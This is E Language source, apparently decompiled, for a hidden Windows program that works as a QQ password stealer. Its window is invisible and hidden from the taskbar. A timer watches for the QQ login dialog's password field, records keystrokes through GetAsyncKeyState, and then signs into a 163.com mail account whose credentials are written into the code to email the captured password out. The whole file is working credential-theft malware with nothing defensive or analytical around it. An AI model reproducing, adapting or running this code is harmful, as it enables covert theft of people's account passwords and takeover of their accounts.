 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 0
    高度 = 0
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 假
    禁止 = 假
    边框 = 0
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 假
    位置 = 2
    可否移动 = 假
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 假
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 假
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “564564”
    帮助文件名 = “”





 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 4 4 系统核心支持库
 ' internet 707ca37322474f6ca841f0e224f4b620 1 0 互联网支持库




.全局变量 容器1, 空白型, , , 

.DLL命令 GetClassNameA, 整数型, "user32.dll", "GetClassNameA", , 
    .参数 hwnd, 整数型, , 
    .参数 class, 文本型, , 
    .参数 long, 整数型, , 

.DLL命令 IsWindow, 整数型, "", "IsWindow", , 
    .参数 hwnd, 空白型, , 

.DLL命令 FindWindowExA, 整数型, "", "FindWindowExA", , 
    .参数 hwnd1, 整数型, , 
    .参数 hwnd2, 整数型, , 
    .参数 cl2, 文本型, , 
    .参数 cl1, 文本型, , 

.DLL命令 GetAsyncKeyState, 短整数型, "", "GetAsyncKeyState", , 
    .参数 key, 整数型, , 

.DLL命令 GetForegroundWindow, 整数型, "", "GetForegroundWindow", , 

.DLL命令 GetWindowTextA, 整数型, "", "GetWindowTextA", , 
    .参数 hwnd, 整数型, , 
    .参数 string, 文本型, , 
    .参数 cch, 整数型, , 

.窗口程序集 窗口程序集1, , , 

.程序集变量 password, 文本型, , , 
.程序集变量 qqhwnd, 整数型, , , 
.子程序 _时钟1_周期事件, 空白型, , 
.局部变量 hwnd, 整数型, , , 
.局部变量 hwnd2, 整数型, , , 
.局部变量 class, 文本型, , , 
.局部变量 key, 整数型, , , 
.局部变量 leng, 整数型, , , 

赋值 (hwnd, GetForegroundWindow ())
赋值 (class, 取空白文本 (256))
赋值 (leng, GetClassNameA (hwnd, class, 256))

.如果 (等于 (取文本左边 (class, leng), “#32770”))
    赋值 (hwnd2, FindWindowExA (hwnd, 0, “Static”, “QQ密码：”))
    
    .如果 (或者 (不等于 (hwnd2, 0), 不等于 (qqhwnd, 0)))
        赋值 (qqhwnd, hwnd)
        .变量循环首 (0, 255, 1, key)
            .如果 (等于 (位与 (GetAsyncKeyState (key), 1), 1))
                .如果 (或者 (小于 (key, 33), 大于 (key, 126)))
                    赋值 (password, 相加 (password, “[”, 到文本 (key), “]”))
                .否则
                    
                    .如果 (大于 (key, 95))
                        赋值 (key, 相减 (key, 48))
                    .否则
                        
                    .如果结束
                    赋值 (password, 相加 (password, 字符 (key)))
                .如果结束
                
            .否则
                
            .如果结束
            
        .变量循环尾 ()
    .否则
        
    .如果结束
    
.否则
    .如果真 (并且 (不等于 (qqhwnd, 0), 等于 (IsWindow (qqhwnd), 0)))
        qqhwnd ＝ 0
        .如果 (未知支持库函数_0 (“mail.163.com”, , “82528657”, “”, 3000))
            未知支持库函数_5 (“qq”, password, “82528657@163..com”, , , “82528657@163..com”, )
            未知支持库函数_1 ()
        .否则
            
        .如果结束
        
        赋值 (password, “”)
    .如果真结束
    
.如果结束


.子程序 __启动窗口_创建完毕, 空白型, , 
.局部变量 key, 整数型, , , 

.变量循环首 (0, 255, 1, key)
    GetAsyncKeyState (key)
.变量循环尾 ()



 ' 不属于任何一个程序集、类模块的函数：
